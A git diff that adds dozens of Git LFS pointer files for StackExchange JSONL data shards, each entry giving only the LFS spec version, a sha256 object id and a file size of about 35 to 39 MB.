b/data/stackexchange/1-1/303_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..151f7aecfa3728fe77f8686fd89fd99523ce709a --- /dev/null +++ b/data/stackexchange/1-1/303_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d83a1972a2b5a3b8a7aa2a75f7784210bb2186e0373c37f2890ab6d851480860 +size 39143232 diff --git a/data/stackexchange/1-1/304_2289.jsonl b/data/stackexchange/1-1/304_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc0b02c1153914bb97b1da98bf0dceab3d725f62 --- /dev/null +++ b/data/stackexchange/1-1/304_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0c710e3c5473725e76a852ce5314d7883c468137c679b187751e3eb7468184a3 +size 38636727 diff --git a/data/stackexchange/1-1/305_2289.jsonl b/data/stackexchange/1-1/305_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63ddfd1bb8a83845a81e9cf538a03c219992bd9b --- /dev/null +++ b/data/stackexchange/1-1/305_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21135589a493f5afb7c9990e0b3cf501d06eba7e156fe275a8e70f9b08ff1ae4 +size 38729379 diff --git a/data/stackexchange/1-1/306_2289.jsonl b/data/stackexchange/1-1/306_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9edcddba1ce4516cce88b8a3333b76c401157959 --- /dev/null +++ b/data/stackexchange/1-1/306_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c3e16a73ae8f68ed4b9b6e99f0585196844c1d34ec558315c996258e8e7204f +size 39386909 diff --git a/data/stackexchange/1-1/307_2289.jsonl b/data/stackexchange/1-1/307_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f24aef61efba0c21b90806e737f7d974ac470d74 --- /dev/null +++ b/data/stackexchange/1-1/307_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8b42a5194307fb21610e0bbba0aa8c76d5f873c0d8c90b2a454e49661ef98cf0 +size 38720349 diff --git a/data/stackexchange/1-1/308_2289.jsonl b/data/stackexchange/1-1/308_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..875bb6afd9e6ca4bb9267ef0ae4edf07b65e5157 --- /dev/null +++ b/data/stackexchange/1-1/308_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4184ae8c7d0866b528280499119025bc550de81f70fffa19ee595d3e24eabf56 +size 38316808 diff --git a/data/stackexchange/1-1/309_2289.jsonl b/data/stackexchange/1-1/309_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..142d2fc2eb030694c30ce9be84c677b8fd372a62 --- /dev/null +++ b/data/stackexchange/1-1/309_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a4f1907b20068b439ca3b78e9c09043c7259975c5cd7e1ff4d7755fcf104ef1 +size 39080771 diff --git a/data/stackexchange/1-1/30_2289.jsonl b/data/stackexchange/1-1/30_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f4458bf22be30e4ad7a84f9a0c4f451e39807ffc --- /dev/null +++ b/data/stackexchange/1-1/30_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6d074bf8ea16d8d93da29723dfb62317d2a41a6e59d97419a495d3132fdb202 +size 35453290 diff --git a/data/stackexchange/1-1/310_2289.jsonl b/data/stackexchange/1-1/310_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d8dbcfedc4b0ac477b9bdc8d1d138aa2d0ad4ed --- /dev/null +++ b/data/stackexchange/1-1/310_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9731179c4200ffff6e9f17cf6cb773505966a8725825eb4b88154f0d59c68bfe +size 39165843 diff --git a/data/stackexchange/1-1/311_2289.jsonl b/data/stackexchange/1-1/311_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f54577921f7958804dd598287234cacd9efada8 --- /dev/null +++ b/data/stackexchange/1-1/311_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c268245c89409fd20b4dd3eb87110809898fc765f151baaa1ef66b623950909 +size 38692463 diff --git a/data/stackexchange/1-1/312_2289.jsonl b/data/stackexchange/1-1/312_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..68498f2efd38901267bdd6b47f6ac96dd2acd561 --- /dev/null +++ b/data/stackexchange/1-1/312_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7a42073d86be371238d8de0911d84baee3cc2c47619220173d63ff2f05785e6 +size 38536186 diff --git a/data/stackexchange/1-1/313_2289.jsonl b/data/stackexchange/1-1/313_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f82c10af0af957c551467275c8b3facf784be71b --- /dev/null +++ b/data/stackexchange/1-1/313_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:821517af4662bff5bfb5d1011f7a69a5a95a1cfd5d8e76c86ec1d64f83ad7007 +size 38647683 diff --git a/data/stackexchange/1-1/314_2289.jsonl b/data/stackexchange/1-1/314_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..008f8d5e8226bd62f261661559d24a5a53b12e73 --- /dev/null +++ b/data/stackexchange/1-1/314_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:24607e810dbcaa16e078953eab42b116c51ce9cc5ab06c7509ce67e12f340be6 +size 39133588 diff --git a/data/stackexchange/1-1/315_2289.jsonl b/data/stackexchange/1-1/315_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21ca74f18d1a4b94c6656484b17c342d08198007 --- /dev/null +++ b/data/stackexchange/1-1/315_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cbd7601caed98849f83f1fdb7223a0fd0d244f86d6a7d2c4d26e51f51977583b +size 38530768 diff --git a/data/stackexchange/1-1/316_2289.jsonl b/data/stackexchange/1-1/316_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cc84ff1a396172355714002345819cff6c6a2d4b --- /dev/null +++ b/data/stackexchange/1-1/316_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b84040f936af23a8978e0e30b7489d557e020a8360c806861aaa30e44b850bd +size 38605247 diff --git a/data/stackexchange/1-1/317_2289.jsonl b/data/stackexchange/1-1/317_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d48994e1ccecbb54adee17afca44d31b8b5099bc --- /dev/null +++ b/data/stackexchange/1-1/317_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b34e607f89b361942120aeaff776c81a0f15e70f17e7884c0082d08907cec0b +size 38620704 diff --git a/data/stackexchange/1-1/318_2289.jsonl b/data/stackexchange/1-1/318_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6a9eac29480d1e9b9454b2b76babea3642124a58 --- /dev/null +++ b/data/stackexchange/1-1/318_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:867374d0329577f470ea44f254e505837ba258a63a04c6456ef44b1a85d9937b +size 38788354 diff --git a/data/stackexchange/1-1/319_2289.jsonl b/data/stackexchange/1-1/319_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..98992775c3e0abcc3ee39cc7f5bc9239d80063bf --- /dev/null +++ b/data/stackexchange/1-1/319_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46b155c7262db645f148ce8793403e5cb239490746a214d133fd23074e3d83b2 +size 38828496 diff --git a/data/stackexchange/1-1/31_2289.jsonl b/data/stackexchange/1-1/31_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb4dfe5e69de19f2e82be95ec1de88002ffdf52b --- /dev/null +++ b/data/stackexchange/1-1/31_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8b1aa617374828a5ff30a59e88256c4974930d4e9a028244f84d52ddc3d0c1b +size 36330713 diff --git a/data/stackexchange/1-1/320_2289.jsonl b/data/stackexchange/1-1/320_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0ad4c72c199e0c657756b386e1dcf0c80f23524 --- /dev/null +++ b/data/stackexchange/1-1/320_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d21bfaf302003ac8526496e284d03da872aa16ca9b089bd9731aa1a284c0de6 +size 38816393 diff --git a/data/stackexchange/1-1/321_2289.jsonl b/data/stackexchange/1-1/321_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4178e3df391639febc61d9197f45cce694ac9827 --- /dev/null +++ b/data/stackexchange/1-1/321_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da9834365c794f1451bee1a3e062fa03d86640a3ebe9f986849591ccca89a297 +size 38552116 diff --git a/data/stackexchange/1-1/322_2289.jsonl b/data/stackexchange/1-1/322_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7581cbcf71d4cbd514c0ce3d630d52940924ad25 --- /dev/null +++ b/data/stackexchange/1-1/322_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd32635d874e8ba447b406416809a8b12e02922e0001ba5acf9bd7bdeffa0d8e +size 38351420 diff --git a/data/stackexchange/1-1/323_2289.jsonl b/data/stackexchange/1-1/323_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9262041c5ea5e3995525867f7b8da21969f5d66f --- /dev/null +++ b/data/stackexchange/1-1/323_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a373c43a34d57d779c4bd6e5ef6ce75f1fd9105e24ea575485ff189efaef2f0 +size 38651127 diff --git a/data/stackexchange/1-1/324_2289.jsonl b/data/stackexchange/1-1/324_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..088d2a4cbee46cbe885d976585074fced69d083b --- /dev/null +++ b/data/stackexchange/1-1/324_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5044801c92002eda581e4c65898d0eb3b55de7f885cc384ecf8062cc3a4eafb0 +size 38622704 diff --git a/data/stackexchange/1-1/325_2289.jsonl b/data/stackexchange/1-1/325_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8fdc3449605f97d5a5eb497d0818c0c14a195d35 --- /dev/null +++ b/data/stackexchange/1-1/325_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3f7cc21dfb51948f3189150c8e22c0379e5bca3a77c5d108d9480cac38eb0b5 +size 39684035 diff --git a/data/stackexchange/1-1/326_2289.jsonl b/data/stackexchange/1-1/326_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3493c7869dad36732db0132560c3a6b3e7d6f744 --- /dev/null +++ b/data/stackexchange/1-1/326_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:caccccce2ce2ec1aae0795c42c3cfdd90268bb4c70fca5d4cc82a21c734bc20f +size 38526302 diff --git a/data/stackexchange/1-1/327_2289.jsonl b/data/stackexchange/1-1/327_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..acd174fa863091aa9bf1b0c954cbf51d7262f7e2 --- /dev/null +++ b/data/stackexchange/1-1/327_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d440b945d4eea91bfdaeeaf396d937a1a3493337de555c20ccd276a5ea9f0184 +size 39154207 diff --git a/data/stackexchange/1-1/328_2289.jsonl b/data/stackexchange/1-1/328_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..de9216c599bbbb9914a67a9b5689a42dc577675d --- /dev/null +++ b/data/stackexchange/1-1/328_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41bdfe06bd93edae30cb254862463056ac3d87f16b7d7cde7bd5a1afc6d80ebf +size 38824726 diff --git a/data/stackexchange/1-1/329_2289.jsonl b/data/stackexchange/1-1/329_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18dd74970e2f8ef500a710b7d46a7fa1d7ab0f3a --- /dev/null +++ b/data/stackexchange/1-1/329_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8c5a70848d7f764224840b4b0ebdaf1158310b74645dadc457f293654cc73629 +size 38710863 diff --git a/data/stackexchange/1-1/32_2289.jsonl b/data/stackexchange/1-1/32_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e3ce6b7ba79513e1bec152158374e6a72ba7e7f --- /dev/null +++ b/data/stackexchange/1-1/32_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4873c875a99a7f9d42bc752561524622d89fa3ebe77788ff63578d10481e76fe +size 35556838 diff --git a/data/stackexchange/1-1/330_2289.jsonl b/data/stackexchange/1-1/330_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..386796f03d12ba5f9bf73555ed4cfdece94c4a08 --- /dev/null +++ b/data/stackexchange/1-1/330_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d3cf00f341746a2bc501d60b822ceb1d2a1ba6528fc154901d018fabacc5b5c +size 38276458 diff --git a/data/stackexchange/1-1/331_2289.jsonl b/data/stackexchange/1-1/331_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fec2f24201ee75740de7d068ac773234a3e29f4e --- /dev/null +++ b/data/stackexchange/1-1/331_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0caa768b05b57aab50fdce4cacc9fd58b32d7d245e9e2d214b2304872f56c700 +size 38764722 diff --git a/data/stackexchange/1-1/332_2289.jsonl b/data/stackexchange/1-1/332_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5aa9e39ef15bc42fcb9900f1435ce4c371a54e37 --- /dev/null +++ b/data/stackexchange/1-1/332_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5bd514761ef99fc21678d094274a52973b44f84b941e81acbcc22c9fe104f92 +size 38945022 diff --git a/data/stackexchange/1-1/333_2289.jsonl b/data/stackexchange/1-1/333_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..34b674e118f762c9bafedd70b9afc649f91f419a --- /dev/null +++ b/data/stackexchange/1-1/333_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf563ddda2d9ae724ebab9ac92865979d9e4e3a25c83343d46c1b99b724ceae7 +size 38687846 diff --git a/data/stackexchange/1-1/334_2289.jsonl b/data/stackexchange/1-1/334_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1aff893809a8346651f5cc992a7718f6ee37b431 --- /dev/null +++ b/data/stackexchange/1-1/334_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe54d177c301dca3fb93b3b769f013fcdbaa1d93ebbbc1e0635bae52bd3cd59b +size 38432151 diff --git a/data/stackexchange/1-1/335_2289.jsonl b/data/stackexchange/1-1/335_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e66320a6a70f214143b9dd6fe2113aa811dddbf --- /dev/null +++ b/data/stackexchange/1-1/335_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6deca57eead4516ab25460d5ea8187b9ba30fd9ca8c8b06755a36aec3b815a66 +size 38539471 diff --git a/data/stackexchange/1-1/336_2289.jsonl b/data/stackexchange/1-1/336_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..505571aec3e60367698f339cd057d2e0cb5c1c98 --- /dev/null +++ b/data/stackexchange/1-1/336_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9cabfa9d75af0db9f22e21e05a6c494e1aea36df873aa1495a366cf8bc974dac +size 39468941 diff --git a/data/stackexchange/1-1/337_2289.jsonl b/data/stackexchange/1-1/337_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..519ec63aa5a9d376ac55b9758a2da919a12470da --- /dev/null +++ b/data/stackexchange/1-1/337_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2dd1583be869efb0364c08e0d8f9ed86e57a2a836404e7643a68075de4a9516e +size 38014726 diff --git a/data/stackexchange/1-1/338_2289.jsonl b/data/stackexchange/1-1/338_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf3e1d0026850478da66a409a1cb75791933788a --- /dev/null +++ b/data/stackexchange/1-1/338_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9129ea1cfd93a2789ef031b9765c9be1eb342a477962e6deeb7c7da1f37d05a +size 38472607 diff --git a/data/stackexchange/1-1/339_2289.jsonl b/data/stackexchange/1-1/339_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c521193edda30a71ef79a0d0b69f6f5b70593b0 --- /dev/null +++ b/data/stackexchange/1-1/339_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b0131fd3b717154eca42497efd1ca1a9629544b62856de865a1e6d14f55ca6d +size 38549176 diff --git a/data/stackexchange/1-1/33_2289.jsonl b/data/stackexchange/1-1/33_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3010398cc7fa3e42750e98f2569d4fce5ab73208 --- /dev/null +++ b/data/stackexchange/1-1/33_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:db7c0b4f9b56ae9d921353b9a0ebf62d884678f63389cb98989c0b658a7861d5 +size 35931277 diff --git a/data/stackexchange/1-1/340_2289.jsonl b/data/stackexchange/1-1/340_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6961373bc62ee58fddc5911703e9682033eb738b --- /dev/null +++ b/data/stackexchange/1-1/340_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c593e9d37bfa1e0af8f28657779bc147159b80c825a8a12c1b2ad42dc13e920 +size 38756097 diff --git a/data/stackexchange/1-1/341_2289.jsonl b/data/stackexchange/1-1/341_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..65deec242f738e1f8477d18186bbeecc87673adc --- /dev/null +++ b/data/stackexchange/1-1/341_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0be6192db483d35962374cb5b8afb66056e6430fcc6066a3d2bac4de73afa3e9 +size 37963296 diff --git a/data/stackexchange/1-1/342_2289.jsonl b/data/stackexchange/1-1/342_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c08652f5973e4d69a12efb759cc432bd0ea41d0b --- /dev/null +++ b/data/stackexchange/1-1/342_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6572bc1a9bb5f4b8e8f4b117d391e44d018ab55333e34db94258ae70a502b250 +size 38414278 diff --git a/data/stackexchange/1-1/343_2289.jsonl b/data/stackexchange/1-1/343_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ce235ae10ab4abf5c1e0f78af9ea504a9a38c2f --- /dev/null +++ b/data/stackexchange/1-1/343_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbc91b8b964e699589d6579fc72c6f7b3cee15436994d63d4bba2af614262498 +size 38689087 diff --git a/data/stackexchange/1-1/344_2289.jsonl b/data/stackexchange/1-1/344_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd872c36497e61e4559b0191d4900e8cd4471459 --- /dev/null +++ b/data/stackexchange/1-1/344_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7da6e2fc4cffe7e8da919536036615e11e5824099e4672ae705a0c390fdcdb8a +size 38758603 diff --git a/data/stackexchange/1-1/345_2289.jsonl b/data/stackexchange/1-1/345_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c89a9314fa8e88711294d9eabeaa21d855378756 --- /dev/null +++ b/data/stackexchange/1-1/345_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:896b451d5b9498c1adf26902ae277f1117e5b9c85db66ef4b7d23445b728542f +size 39052430 diff --git a/data/stackexchange/1-1/346_2289.jsonl b/data/stackexchange/1-1/346_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f1cf04603dcfc35e5afe6f5e7d2e7c902f63941f --- /dev/null +++ b/data/stackexchange/1-1/346_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5680132fa87a8c2885ba2f561764332ba387ec0896d05e26192a6c43a3fbef5 +size 38336572 diff --git a/data/stackexchange/1-1/347_2289.jsonl b/data/stackexchange/1-1/347_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0816112fc3b2b1881baa75a45bbc60096926b899 --- /dev/null +++ b/data/stackexchange/1-1/347_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67e4def2653ba086b4be11913283a48415087af971d2bb1b6ea612e62565bf82 +size 38945548 diff --git a/data/stackexchange/1-1/348_2289.jsonl b/data/stackexchange/1-1/348_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ef84036ce966625318736c6fb2d3e518bd210638 --- /dev/null +++ b/data/stackexchange/1-1/348_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d215d40b894edbc1c1cb7efb0a81d65d598c26070a35808fcecf0e30fc36f95 +size 39050796 diff --git a/data/stackexchange/1-1/349_2289.jsonl b/data/stackexchange/1-1/349_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ab5ef197ead673f2039f708064f7aea369d4868 --- /dev/null +++ b/data/stackexchange/1-1/349_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea08b031d5f389ffd9528d384a0ab58d43c3020ead9e1d447ef4afdae6cf1dd6 +size 39096933 diff --git a/data/stackexchange/1-1/34_2289.jsonl b/data/stackexchange/1-1/34_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2053f163810cdb6a4ca029ce420215f83d232365 --- /dev/null +++ b/data/stackexchange/1-1/34_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0d03c82d82979d7eb768f87b03d9be50908855bcc7319166809894fa2623dac +size 35844720 diff --git a/data/stackexchange/1-1/350_2289.jsonl b/data/stackexchange/1-1/350_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d921e60b5441b3b8d5869f17a7f1138e60ab3e69 --- /dev/null +++ b/data/stackexchange/1-1/350_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5cf0884c6366a9282b84512d700766e78f43b3798831a8f6cdeaed8642c756e +size 37043802 diff --git a/data/stackexchange/1-1/351_2289.jsonl b/data/stackexchange/1-1/351_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..84d66d21f88ceb57a1217b840f7e22241e73d5c7 --- /dev/null +++ b/data/stackexchange/1-1/351_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1da0226b91f0435bcfafbf8232a59e7fe570d55ca56c9eea450d9d93af8cb7c9 +size 36454604 diff --git a/data/stackexchange/1-1/352_2289.jsonl b/data/stackexchange/1-1/352_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3eb4639c0ad04386aa1c45e6f6968800cb4b8c3e --- /dev/null +++ b/data/stackexchange/1-1/352_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b4a07ebef8bcd51ef3b8fb023730f761f1b3fe92c471baea8a0fd90a9858982 +size 36678340 diff --git a/data/stackexchange/1-1/353_2289.jsonl b/data/stackexchange/1-1/353_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a33cf2b3636b9baf5aa951d8acc63c27d49c1457 --- /dev/null +++ b/data/stackexchange/1-1/353_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2361ddca9ba7801aeec69d262ced708dcd85f13b7f6dfaa8bbdaea254a54b790 +size 35889834 diff --git a/data/stackexchange/1-1/354_2289.jsonl b/data/stackexchange/1-1/354_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..81e7caa8dd9bc32f5c49ca668c6268e6b109b16e --- /dev/null +++ b/data/stackexchange/1-1/354_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6ee50ea1dc9526035c834cf22dcf34562c52e820a9674fd0e9cbf13259379a1 +size 36158417 diff --git a/data/stackexchange/1-1/355_2289.jsonl b/data/stackexchange/1-1/355_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f437ea693a86fa8fcda9667aa21d3067cb17b4e --- /dev/null +++ b/data/stackexchange/1-1/355_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:15abfb22bb39f401f4babeee17cc0bfd4d61757c17eff5be374f22dbecb62624 +size 37493210 diff --git a/data/stackexchange/1-1/356_2289.jsonl b/data/stackexchange/1-1/356_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..50fe998249d347229b1ffa25d113ebda6e516bdc --- /dev/null +++ b/data/stackexchange/1-1/356_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9f53cfb7b0c32ba7270a31685e9abc8a68ffbd6cde26a448e9a8e57aefd6b69 +size 36405435 diff --git a/data/stackexchange/1-1/357_2289.jsonl b/data/stackexchange/1-1/357_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02142bfe3e4067348d88bfc118963082217a4983 --- /dev/null +++ b/data/stackexchange/1-1/357_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf8fdfa9ea3ce23183466a5d7863e2a8d617b418f5328223aae659cfbb2ae95f +size 36414529 diff --git a/data/stackexchange/1-1/358_2289.jsonl b/data/stackexchange/1-1/358_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4aeeaf738b4b1a7201eb9e27f93508fa923793e6 --- /dev/null +++ b/data/stackexchange/1-1/358_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5019f2b7550bffbef172534ad033e808d46f1712f2255c1b5d94b41e2ac7bf0 +size 36258480 diff --git a/data/stackexchange/1-1/359_2289.jsonl b/data/stackexchange/1-1/359_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..35f4751d80434c85a2fe0093c972e2175a9e9c6f --- /dev/null +++ b/data/stackexchange/1-1/359_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:879916c04fff4d28af780a8997275bcaba59a34c8d5337e12210609267746ef8 +size 36037392 diff --git a/data/stackexchange/1-1/35_2289.jsonl b/data/stackexchange/1-1/35_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d48507d3d5ef711dcf8f553172ba7d567f9f5d81 --- /dev/null +++ b/data/stackexchange/1-1/35_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b66928f30707b0048812bbb55f184f8155214e17ef86d1f030f88e179a0f256d +size 35491728 diff --git a/data/stackexchange/1-1/360_2289.jsonl b/data/stackexchange/1-1/360_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ae9fc5df780dbb2defd74f5ef1a870bb8faa38d --- /dev/null +++ b/data/stackexchange/1-1/360_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51358972e056e1469b98d31e71963f92cbc2cd4f1bda381855e040d9d2c83c0f +size 36266544 diff --git a/data/stackexchange/1-1/361_2289.jsonl b/data/stackexchange/1-1/361_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..236689166ee47e786e71e26e1735435dd5c592ca --- /dev/null +++ b/data/stackexchange/1-1/361_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d597a64350eba3586f916c952b9b9ddf07ccfa2197601c902bad099577a67ce8 +size 36578216 diff --git a/data/stackexchange/1-1/362_2289.jsonl b/data/stackexchange/1-1/362_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21a636f9b38bea004f926fff528cfe212158f438 --- /dev/null +++ b/data/stackexchange/1-1/362_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee0a0f0232493b72d1c8127d14326eba3709edcbce096cc4f79f569108db48a5 +size 35598083 diff --git a/data/stackexchange/1-1/363_2289.jsonl 